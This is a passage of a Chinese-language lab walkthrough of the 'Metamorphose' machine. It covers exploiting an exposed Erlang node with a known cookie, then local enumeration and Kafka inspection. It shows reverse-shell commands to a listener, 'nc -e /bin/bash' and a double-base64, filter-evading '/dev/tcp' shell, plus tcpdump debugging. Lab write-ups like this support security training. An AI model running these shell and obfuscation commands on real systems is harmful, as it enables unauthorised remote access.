&quot;shell-erldp.py&quot;, line 172, in &lt;module&gt;\n    reply = recv_reply(sock)\n  File &quot;shell-erldp.py&quot;, line 147, in recv_reply\n    terms = [t for t in erl_dist_recv(f)]\n  File &quot;shell-erldp.py&quot;, line 94, in erl_dist_recv\n    (parsed, term) = erl.binary_to_term(data)\n  File &quot;\/home\/kali\/temp\/Metamorphose\/erl-matter\/erlang.py&quot;, line 421, in binary_to_term\n    i, term = _binary_to_term(1, data)\n  File &quot;\/home\/kali\/temp\/Metamorphose\/erl-matter\/erlang.py&quot;, line 505, in _binary_to_term\n    i, tuple_value = _binary_to_term_sequence(i, length, data)\n  File &quot;\/home\/kali\/temp\/Metamorphose\/erl-matter\/erlang.py&quot;, line 630, in _binary_to_term_sequence\n    i, element = _binary_to_term(i, data)\n  File &quot;\/home\/kali\/temp\/Metamorphose\/erl-matter\/erlang.py&quot;, line 625, in _binary_to_term\n    raise ParseException(&#039;invalid tag&#039;)\nerlang.ParseException: invalid tag<\/code><\/pre>\n<p>\u627echatgpt\u95ee\u4e86\u4e00\u4e0b\uff0c\u53d1\u73b0\uff1a<\/p>\n<blockquote>\n<p>\u6839\u636e\u63d0\u4f9b\u7684\u9519\u8bef\u4fe1\u606f\uff0c\u8fd9\u4e2a\u5f02\u5e38\u662f\u5728\u5c1d\u8bd5\u89e3\u6790\u4ece\u4e00\u4e2aErlang\u5206\u5e03\u534f\u8bae (Erlang Distribution Protocol, erldp) \u63a5\u6536\u5230\u7684\u6570\u636e\u65f6\u89e6\u53d1\u7684\u3002\u9519\u8bef <code>erlang.ParseException: invalid tag<\/code> \u8868\u660e\u5728\u89e3\u6790\u8fc7\u7a0b\u4e2d\u9047\u5230\u4e86\u65e0\u6cd5\u8bc6\u522b\u7684\u6570\u636e\u6807\u7b7e\u3002<\/p>\n<p>\u8fd9\u91cc\u6709\u51e0\u4e2a\u53ef\u80fd\u7684\u539f\u56e0\u548c\u89e3\u51b3\u65b9\u6cd5\uff1a<\/p>\n<ol>\n<li><strong>\u6570\u636e\u683c\u5f0f\u95ee\u9898<\/strong>:\n<ul>\n<li>\u786e\u4fdd\u53d1\u9001\u65b9\u53d1\u9001\u7684\u662f\u6709\u6548\u7684 Erlang \u9879\uff08\u4f8b\u5982\u5143\u7ec4\u3001\u5217\u8868\u3001\u539f\u5b50\u7b49\uff09\u5e76\u4e14\u8fd9\u4e9b\u9879\u6b63\u786e\u5730\u88ab\u7f16\u7801\u4e3a\u4e8c\u8fdb\u5236\u683c\u5f0f\u3002<\/li>\n<li>\u68c0\u67e5\u53d1\u9001\u65b9\u662f\u5426\u4f7f\u7528\u4e86\u6b63\u786e\u7684 Erlang \u5206\u5e03\u534f\u8bae\u7248\u672c\uff0c\u5e76\u4e14\u63a5\u6536\u7aef\u80fd\u591f\u7406\u89e3\u8be5\u7248\u672c\u3002<\/li>\n<\/ul>\n<\/li>\n<li><strong>\u7f51\u7edc\u4f20\u8f93\u95ee\u9898<\/strong>:\n<ul>\n<li>\u6570\u636e\u5728\u7f51\u7edc\u4f20\u8f93\u8fc7\u7a0b\u4e2d\u53ef\u80fd\u88ab\u635f\u574f\u6216\u622a\u65ad\u3002\u786e\u4fdd\u7f51\u7edc\u8fde\u63a5\u7a33\u5b9a\u53ef\u9760\u3002<\/li>\n<li>\u5982\u679c\u4f7f\u7528\u7684\u662f UDP \u6216\u5176\u4ed6\u4e0d\u53ef\u9760\u7684\u534f\u8bae\uff0c\u786e\u4fdd\u6240\u6709\u6570\u636e\u5305\u90fd\u5df2\u5b8c\u6574\u63a5\u6536\u3002<\/li>\n<\/ul>\n<\/li>\n<li><strong>\u4ee3\u7801\u5b9e\u73b0\u95ee\u9898<\/strong>:\n<ul>\n<li>\u5728 <code>erl-matter\/erlang.py<\/code> \u4e2d\u7684 <code>_binary_to_term<\/code> \u51fd\u6570\u4e2d\uff0c\u5982\u679c\u9047\u5230\u672a\u77e5\u6216\u4e0d\u652f\u6301\u7684\u6570\u636e\u7c7b\u578b\uff0c\u5219\u4f1a\u629b\u51fa <code>ParseException<\/code>\u3002\u68c0\u67e5\u8be5\u51fd\u6570\u4ee5\u4e86\u89e3\u54ea\u4e9b\u6807\u7b7e\u662f\u88ab\u652f\u6301\u7684\uff0c\u4ee5\u53ca\u54ea\u4e9b\u6807\u7b7e\u4f1a\u5bfc\u81f4\u6b64\u5f02\u5e38\u3002<\/li>\n<li>\u786e\u8ba4 <code>_binary_to_term<\/code> \u548c <code>_binary_to_term_sequence<\/code> \u51fd\u6570\u662f\u5426\u80fd\u6b63\u786e\u5904\u7406\u6240\u6709\u53ef\u80fd\u7684\u6570\u636e\u7ed3\u6784\u548c\u6807\u7b7e\u3002<\/li>\n<\/ul>\n<\/li>\n<li><strong>\u8c03\u8bd5\u5efa\u8bae<\/strong>:\n<ul>\n<li>\u5728 <code>recv_reply<\/code> \u548c <code>erl_dist_recv<\/code> \u51fd\u6570\u4e2d\u6dfb\u52a0\u8c03\u8bd5\u8f93\u51fa\uff0c\u6253\u5370\u63a5\u6536\u5230\u7684\u539f\u59cb\u6570\u636e\uff0c\u4ee5\u4fbf\u68c0\u67e5\u6570\u636e\u662f\u5426\u7b26\u5408\u9884\u671f\u3002<\/li>\n<li>\u68c0\u67e5\u53d1\u9001\u65b9\u7684\u4ee3\u7801\u903b\u8f91\uff0c\u786e\u4fdd\u5b83\u6309\u7167 Erlang \u7684\u4e8c\u8fdb\u5236\u672f\u8bed\u683c\u5f0f\u6b63\u786e\u5730\u6784\u9020\u4e86\u6570\u636e\u3002<\/li>\n<li>\u5982\u679c\u53ef\u80fd\u7684\u8bdd\uff0c\u4f7f\u7528 Erlang \u7684\u5185\u7f6e\u5de5\u5177\u8fdb\u884c\u6d4b\u8bd5\uff0c\u6bd4\u5982 <code>net_adm:ping\/1<\/code>\uff0c\u4ee5\u786e\u8ba4\u63a5\u6536\u7aef\u53ef\u4ee5\u6b63\u786e\u5730\u4e0e Erlang \u8282\u70b9\u901a\u4fe1\u3002<\/li>\n<\/ul>\n<\/li>\n<li><strong>\u7248\u672c\u517c\u5bb9\u6027\u95ee\u9898<\/strong>:\n<ul>\n<li>\u5982\u679c\u4f60\u7684\u4ee3\u7801\u4f9d\u8d56\u4e8e\u7279\u5b9a\u7248\u672c\u7684 Erlang\uff0c\u786e\u4fdd\u5ba2\u6237\u7aef\u548c\u670d\u52a1\u7aef\u4f7f\u7528\u7684 Erlang \u7248\u672c\u517c\u5bb9\u3002****<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<\/blockquote>\n<p>\u5c1d\u8bd5\u6293\u5305\u770b\u4e00\u4e0b\uff1a<\/p>\n<blockquote>\n<p>-vvv\uff1a\u4ea7\u751f\u6bd4-vv\u66f4\u8be6\u7ec6\u7684\u8f93\u51fa\u3002 <\/p>\n<p>-XX\uff1a\u8f93\u51fa\u5305\u7684\u5934\u90e8\u6570\u636e\uff0c\u4f1a\u4ee516\u8fdb\u5236\u548cASCII\u4e24\u79cd\u65b9\u5f0f\u540c\u65f6\u8f93\u51fa\u3002<\/p>\n<p>-nn \uff1a\u76f4\u63a5\u4ee5IP\u4ee5\u53caPORT number\u663e\u793a\uff0c\u800c\u975e\u4e3b\u673a\u540d\u4e0e\u670d\u52a1\u540d\u79f0<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ sudo tcpdump -i eth1 host 172.20.10.3 -vvv -XX -nn     \ntcpdump: listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes\n.........\n11:21:13.819722 IP (tos 0x0, ttl 64, id 32961, offset 0, flags [DF], proto TCP (6), length 93)\n    172.20.10.3.40121 &gt; 172.20.10.8.44550: Flags [P.], cksum 0xd59c (correct), seq 6:47, ack 32, win 509, options [nop,nop,TS val 3619497937 ecr 1177140916], length 41\n        0x0000:  0800 27fb 51ff 0800 27df cd6e 0800 4500  ..&#039;.Q...&#039;..n..E.\n        0x0010:  005d 80c1 4000 4006 4da6 ac14 0a03 ac14  .]..@.@.M.......\n        0x0020:  0a08 9cb9 ae06 31a1 1561 ceb8 3709 8018  ......1..a..7...\n        0x0030:  01fd d59c 0000 0101 080a d7bd 27d1 4629  ............&#039;.F)\n        0x0040:  beb4 0027 4e00 0000 0d07 df7f bd9d f8eb  ...&#039;N...........\n        0x0050:  b666 b0d3 1f00 146e 6574 776f 726b 406d  .f.....network@m\n        0x0060:  6574 616d 6f72 7068 6f73 65              etamorphose\n...............\n11:21:13.832587 IP (tos 0x0, ttl 64, id 32963, offset 0, flags [DF], proto TCP (6), length 178)\n    172.20.10.3.40121 &gt; 172.20.10.8.44550: Flags [P.], cksum 0xf79a (correct), seq 66:192, ack 161, win 509, options [nop,nop,TS val 3619497950 ecr 1177140919], length 126\n        0x0000:  0800 27fb 51ff 0800 27df cd6e 0800 4500  ..&#039;.Q...&#039;..n..E.\n        0x0010:  00b2 80c3 4000 4006 4d4f ac14 0a03 ac14  ....@.@.MO......\n        0x0020:  0a08 9cb9 ae06 31a1 159d ceb8 378a 8018  ......1.....7...\n        0x0030:  01fd f79a 0000 0101 080a d7bd 27de 4629  ............&#039;.F)\n        0x0040:  beb7 0000 007a 7083 6803 6102 7700 5877  .....zp.h.a.w.Xw\n        0x0050:  0e56 5155 4654 4a40 6e6f 7768 6572 6500  .VQUFTJ@nowhere.\n        0x0060:  0000 0300 0000 0000 0000 0083 6802 7703  ............h.w.\n        0x0070:  7265 786b 004a 7569 643d 3130 3030 286d  rexk.Juid=1000(m\n        0x0080:  656c 626f 7572 6e65 2920 6769 643d 3130  elbourne).gid=10\n        0x0090:  3030 286d 656c 626f 7572 6e65 2920 6772  00(melbourne).gr\n        0x00a0:  6f75 7073 3d31 3030 3028 6d65 6c62 6f75  oups=1000(melbou\n        0x00b0:  726e 6529 2c31 3030 2875 7365 7273 290a  rne),100(users).<\/code><\/pre>\n<p>\u53d1\u73b0\u662f\u6709\u5305\u7684\uff0c\u4e14\u53ef\u4ee5\u8fd4\u56de\u7684\uff0c\u5c1d\u8bd5\u8fdb\u884c\u53cd\u5f39shell\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ python2 shell-erldp.py 172.20.10.3 40121 batman &#039;nc -e \/bin\/bash 172.20.10.8 1234&#039;\n[*] authenticated onto victim<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058523.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058523.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240805232810783\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u4e2a\u5730\u65b9<a href=\"https:\/\/www.youtube.com\/@thePL4GU3\">PL4GU3<\/a>\u5927\u4f6c\u4e3a\u4e86\u7701\u4e8b\u76f4\u63a5\u53cc\u91cd<code>base64<\/code>\u52a0\u5bc6\uff0c\u662f\u4e2a\u5f88\u503c\u5f97\u5b66\u4e60\u7684\u601d\u8def\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\"># bash -i &amp;&gt;\/dev\/tcp\/172.20.10.8\/1234 &lt;&amp;1\n# YmFzaCAtaSAmPi9kZXYvdGNwLzE3Mi4yMC4xMC44LzEyMzQgPCYx\n# WW1GemFDQXRhU0FtUGk5a1pYWXZkR053THpFM01pNHlNQzR4TUM0NEx6RXlNelFnUENZeA==\n# echo${IFS}WW1GemFDQXRhU0FtUGk5a1pYWXZkR053THpFM01pNHlNQzR4TUM0NEx6RXlNelFnUENZeA==|ba&#039;&#039;se&#039;&#039;6&#039;&#039;4${IFS}-&#039;&#039;d|ba&#039;&#039;se&#039;&#039;64${IFS}-&#039;&#039;d|b&#039;&#039;a&#039;&#039;s&#039;&#039;h\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ python2 shell-erldp.py 172.20.10.3 40121 batman                                   \n[*] authenticated onto victim\n172.20.10.3:40121 $ echo${IFS}WW1GemFDQXRhU0FtUGk5a1pYWXZkR053THpFM01pNHlNQzR4TUM0NEx6RXlNelFnUENZeA==|ba&#039;&#039;se&#039;&#039;6&#039;&#039;4${IFS}-&#039;&#039;d|ba&#039;&#039;se&#039;&#039;64${IFS}-&#039;&#039;d|b&#039;&#039;a&#039;&#039;s&#039;&#039;h<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058524.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058524.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240805233704132\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) melbourne@metamorphose.hmv:\/$ whoami;id\nmelbourne\nuid=1000(melbourne) gid=1000(melbourne) groups=1000(melbourne),100(users)\n(remote) melbourne@metamorphose.hmv:\/$ cd ~\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ ls -la\ntotal 28\ndrwx------ 3 melbourne melbourne 4096 Feb 26 17:32 .\ndrwxr-xr-x 4 root      root      4096 Feb 26 17:14 ..\nlrwxrwxrwx 1 root      root         9 Feb 26 17:32 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 melbourne melbourne  220 Feb 26 17:14 .bash_logout\n-rw-r--r-- 1 melbourne melbourne 3526 Feb 26 17:14 .bashrc\n-rw------- 1 melbourne melbourne    7 Feb 26 17:15 .erlang.cookie\ndrwxr-xr-x 3 melbourne melbourne 4096 Mar  2 18:23 .local\n-rw-r--r-- 1 melbourne melbourne  807 Feb 26 17:14 .profile\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ cd .local\/\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne\/.local$ ls -la\ntotal 16\ndrwxr-xr-x 3 melbourne melbourne 4096 Mar  2 18:23 .\ndrwx------ 3 melbourne melbourne 4096 Feb 26 17:32 ..\n-rwxr-xr-x 1 melbourne melbourne  102 Feb 26 17:15 erlang\ndrwx------ 3 melbourne melbourne 4096 Feb 26 17:15 share\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne\/.local$ cat erlang \n#!\/bin\/bash\n\nsleep 4\n\n\/usr\/bin\/erl -sname network@metamorphose -noinput -eval &quot;timer:sleep(infinity)&quot;\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne\/.local$ cd ..\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ cat .erlang.cookie \nbatman\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/fusermount3\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep\n\/usr\/bin\/ping cap_net_raw=ep\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ sudo -l\nbash: sudo: command not found\n(remote) melbourne@metamorphose.hmv:\/home\/melbourne$ cd \/\n(remote) melbourne@metamorphose.hmv:\/$ ls -la\ntotal 8488\ndrwxr-xr-x  18 root root  266240 May 28 11:22 .\ndrwxr-xr-x  18 root root  266240 May 28 11:22 ..\nlrwxrwxrwx   1 root root       7 Feb 26 09:57 bin -&gt; usr\/bin\ndrwxr-xr-x   3 root root    4096 May 28 11:23 boot\ndrwxr-xr-x  17 root root    3320 Aug  5 15:26 dev\ndrwxr-xr-x  95 root root    4096 Aug  5 15:26 etc\ndrwxr-xr-x   4 root root    4096 Feb 26 17:14 home\nlrwxrwxrwx   1 root root      30 May 28 11:22 initrd.img -&gt; boot\/initrd.img-6.1.0-21-amd64\nlrwxrwxrwx   1 root root      30 Feb 26 09:58 initrd.img.old -&gt; boot\/initrd.img-6.1.0-18-amd64\nlrwxrwxrwx   1 root root       7 Feb 26 09:57 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root       9 Feb 26 09:57 lib64 -&gt; usr\/lib64\ndrwx------   2 root root   16384 Feb 26 09:57 lost+found\ndrwxr-xr-x   3 root root    4096 Feb 26 09:57 media\ndrwxr-xr-x   2 root root    4096 Feb 26 09:57 mnt\ndrwxr-xr-x   3 root root    4096 Feb 26 16:50 opt\ndr-xr-xr-x 139 root root       0 Aug  5 15:26 proc\ndrwx------   4 root root    4096 Mar  3 14:05 root\ndrwxr-xr-x  17 root root     500 Aug  5 15:26 run\nlrwxrwxrwx   1 root root       8 Feb 26 09:57 sbin -&gt; usr\/sbin\ndrwxr-xr-x   2 root root    4096 Feb 26 09:57 srv\ndr-xr-xr-x  13 root root       0 Aug  5 15:26 sys\ndrwxrwxrwt   8 root root 8089600 Aug  5 15:31 tmp\ndrwxr-xr-x  12 root root    4096 Feb 26 09:57 usr\ndrwxr-xr-x  11 root root    4096 Feb 26 09:57 var\nlrwxrwxrwx   1 root root      27 May 28 11:22 vmlinuz -&gt; boot\/vmlinuz-6.1.0-21-amd64\nlrwxrwxrwx   1 root root      27 Feb 26 09:58 vmlinuz.old -&gt; boot\/vmlinuz-6.1.0-18-amd64\n(remote) melbourne@metamorphose.hmv:\/$ cd opt\n(remote) melbourne@metamorphose.hmv:\/opt$ ls -la\ntotal 272\ndrwxr-xr-x  3 root root   4096 Feb 26 16:50 .\ndrwxr-xr-x 18 root root 266240 May 28 11:22 ..\ndrwxrwxr-x  8 root root   4096 Feb 26 16:59 kafka\n(remote) melbourne@metamorphose.hmv:\/opt$ cd kafka\/\n(remote) melbourne@metamorphose.hmv:\/opt\/kafka$ ls -la\ntotal 268\ndrwxrwxr-x 8 root root   4096 Feb 26 16:59 .\ndrwxr-xr-x 3 root root   4096 Feb 26 16:50 ..\ndrwxrwxr-x 3 root root   4096 Feb 17 10:09 bin\ndrwxrwxr-x 3 root root   4096 Feb 25 13:24 config\n-rw-r--r-- 1 root root 176919 Aug  5 15:27 kafka.log\ndrwxrwxr-x 2 root root  12288 Feb 14 19:45 libs\n-rwxrwxr-x 1 root root  15030 Nov 24  2023 LICENSE\ndrwxrwxr-x 2 root root   4096 Nov 24  2023 licenses\ndrwxrwxr-x 4 root root  12288 Aug  5 17:02 logs\n-rwxrwxr-x 1 root root  28184 Nov 24  2023 NOTICE\ndrwxrwxr-x 2 root root   4096 Nov 24  2023 site-docs<\/code><\/pre>\n<h3>\u63d0\u53d6\u76f8\u5173\u4fe1\u606f<\/h3>\n<p>\u4f9d\u7167\u4f5c\u8005\u7684\u4e00\u8d2f\u601d\u8def\uff0c\u4e1c\u897f\u559c\u6b22\u4e22\u5728<code>opt<\/code>\u91cc\uff0c\u5c1d\u8bd5\u63d0\u53d6\u4e00\u4e0b\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058525.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058525.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240805234930821\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7785\u4e00\u773c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058526.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058526.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240805235206219\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058527.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058527.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240805235825887\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) melbourne@metamorphose.hmv:\/opt\/kafka\/bin$ .\/kafka-console-consumer.sh --bootstrap-server broker:9092 --from-beginning --property print.key=true --property key.separator=&quot;-&quot;\nExactly one of --include\/--topic is required. ()\nOption                                   Description                            \n------                                   -----------                            \n--bootstrap-server &lt;String: server to    REQUIRED: The server(s) to connect to. \n  connect to&gt;                                                                   \n--consumer-property &lt;String:             A mechanism to pass user-defined       \n  consumer_prop&gt;                           properties in the form key=value to  \n                                           the consumer.                        \n--consumer.config &lt;String: config file&gt;  Consumer config properties file. Note  \n                                           that [consumer-property] takes       \n                                           precedence over this config.         \n--enable-systest-events                  Log lifecycle events of the consumer   \n                                           in addition to logging consumed      \n                                           messages. (This is specific for      \n                                           system tests.)                       \n--formatter &lt;String: class&gt;              The name of a class to use for         \n                                           formatting kafka messages for        \n                                           display. (default: kafka.tools.      \n                                           DefaultMessageFormatter)             \n--formatter-config &lt;String: config       Config properties file to initialize   \n  file&gt;                                    the message formatter. Note that     \n                                           [property] takes precedence over     \n                                           this config.                         \n--from-beginning                         If the consumer does not already have  \n                                           an established offset to consume     \n                                           from, start with the earliest        \n                                           message present in the log rather    \n                                           than the latest message.             \n--group &lt;String: consumer group id&gt;      The consumer group id of the consumer. \n--help                                   Print usage information.               \n--include &lt;String: Java regex (String)&gt;  Regular expression specifying list of  \n                                           topics to include for consumption.   \n--isolation-level &lt;String&gt;               Set to read_committed in order to      \n                                           filter out transactional messages    \n                                           which are not committed. Set to      \n                                           read_uncommitted to read all         \n                                           messages. (default: read_uncommitted)\n--key-deserializer &lt;String:                                                     \n  deserializer for key&gt;                                                         \n--max-messages &lt;Integer: num_messages&gt;   The maximum number of messages to      \n                                           consume before exiting. If not set,  \n                                           consumption is continual.            \n--offset &lt;String: consume offset&gt;        The offset to consume from (a non-     \n                                           negative number), or &#039;earliest&#039;      \n                                           which means from beginning, or       \n                                           &#039;latest&#039; which means from end        \n                                           (default: latest)                    \n--partition &lt;Integer: partition&gt;         The partition to consume from.         \n                                           Consumption starts from the end of   \n                                           the partition unless &#039;--offset&#039; is   \n                                           specified.                           \n--property &lt;String: prop&gt;                The properties to initialize the       \n                                           message formatter. Default           \n                                           properties include:                  \n                                          print.timestamp=true|false            \n                                          print.key=true|false                  \n                                          print.offset=true|false               \n                                          print.partition=true|false            \n                                          print.headers=true|false              \n                                          print.value=true|false                \n                                          key.separator=&lt;key.separator&gt;         \n                                          line.separator=&lt;line.separator&gt;       \n                                          headers.separator=&lt;line.separator&gt;    \n                                          null.literal=&lt;null.literal&gt;           \n                                          key.deserializer=&lt;key.deserializer&gt;   \n                                          value.deserializer=&lt;value.            \n                                           deserializer&gt;                        \n                                          header.deserializer=&lt;header.          \n                                           deserializer&gt;                        \n                                         Users can also pass in customized      \n                                           properties for their formatter; more \n                                           specifically, users can pass in      \n                                           properties keyed with &#039;key.          \n                                           deserializer.&#039;, &#039;value.              \n                                           deserializer.&#039; and &#039;headers.         \n                                           deserializer.&#039; prefixes to configure \n                                           their deserializers.                 \n--skip-message-on-error                  If there is an error when processing a \n                                           message, skip it instead of halt.    \n--timeout-ms &lt;Integer: timeout_ms&gt;       If specified, exit if no message is    \n                                           available for consumption for the    \n                                           specified interval.                  \n--topic &lt;String: topic&gt;                  The topic to consume on.               \n--value-deserializer &lt;String:                                                   \n  deserializer for values&gt;                                                      \n--version                                Display Kafka version.                 \n--whitelist &lt;String: Java regex          DEPRECATED, use --include instead;     \n  (String)&gt;                                ignored if --include specified.      \n                                           Regular expression specifying list   \n                                           of topics to include for consumption.<\/code><\/pre>\n<p>\u53d1\u73b0\u7f3a\u5c11\u4e00\u4e2atopic\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5bfb\u627e\uff1a<a href=\"https:\/\/www.cnblogs.com\/AcAc-t\/p\/kafka_topic_consumer_group_command.html\">https:\/\/www.cnblogs.com\/AcAc-t\/p\/kafka_topic_consumer_group_command.html<\/a><\/p>\n<pre><code class=\"language-shell\"># \u67e5\u770bkafka topic\u5217\u8868\uff0c\u4f7f\u7528--list\u53c2\u6570\nbin\/kafka-topics.sh --zookeeper 127.0.0.1:2181 --list\n__consumer_offsets\nlx_test_topic\ntest\n\n# \u67e5\u770bkafka\u7279\u5b9atopic\u7684\u8be6\u60c5\uff0c\u4f7f\u7528--topic\u4e0e--describe\u53c2\u6570\nbin\/kafka-topics.sh --zookeeper 127.0.0.1:2181 --topic lx_test_topic --describe\nTopic:lx_test_topic     PartitionCount:1        ReplicationFactor:1     Configs:\nTopic: lx_test_topic    Partition: 0    Leader: 0       Replicas: 0     Isr: 0\n\n# \u67e5\u770bconsumer group\u5217\u8868\uff0c\u4f7f\u7528--list\u53c2\u6570\n# \u67e5\u770bconsumer group\u5217\u8868\u6709\u65b0\u3001\u65e7\u4e24\u79cd\u547d\u4ee4\uff0c\u5206\u522b\u67e5\u770b\u65b0\u7248(\u4fe1\u606f\u4fdd\u5b58\u5728broker\u4e2d)consumer\u5217\u8868\u548c\u8001\u7248(\u4fe1\u606f\u4fdd\u5b58\u5728zookeeper\u4e2d)consumer\u5217\u8868\uff0c\u56e0\u800c\u9700\u8981\u533a\u5206\u6307\u5b9abootstrap--server\u548czookeeper\u53c2\u6570\uff1a\nbin\/kafka-consumer-groups.sh --new-consumer --bootstrap-server 127.0.0.1:9292 